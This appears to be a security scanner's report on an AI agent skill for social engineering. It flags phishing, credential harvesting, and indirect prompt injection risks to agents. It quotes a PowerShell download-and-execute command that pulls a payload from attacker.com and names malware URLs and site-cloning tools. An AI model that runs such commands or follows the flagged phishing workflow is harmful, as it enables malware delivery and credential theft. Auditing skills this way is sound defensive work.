performing-social-engineering

CRITICAL E005: Suspicious download URL detected in skill instructions.

• Suspicious download URL detected (high risk: 0.95). These URLs include multiple attacker-controlled hosts and direct links to executable/script payloads (e.g., attacker.com/payload.ps1, attacker.com/malware.exe), credential-harvesting endpoints, tracking hooks, and phishing/command-and-control infrastructure—so despite some legitimate references, the set is highly suspicious and suitable for malware/credential distribution.

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 1.00). This skill content is explicitly malicious: it provides step‑by‑step instructions and runnable code for phishing, credential harvesting, remote code execution, malware delivery, backdoors, and detection‑avoidance techniques intended to steal credentials and compromise systems.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 1.00). Yes — the SKILL.md explicitly instructs fetching and mirroring public websites (e.g., "Clone Legitimate Sites" with httrack/wget/curl to copy http://legitimate-site.com) and performing social-media recon (LinkedIn/theHarvester), so the agent would ingest untrusted public/user-generated content that could materially influence campaign actions.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 1.00). The skill contains runtime commands that fetch and execute remote code—e.g., the VBA/HTA/PowerShell examples call IEX((new-object net.webclient).downloadstring('http://attacker.com/payload.ps1')), which downloads and immediately executes code from http://attacker.com/payload.ps1.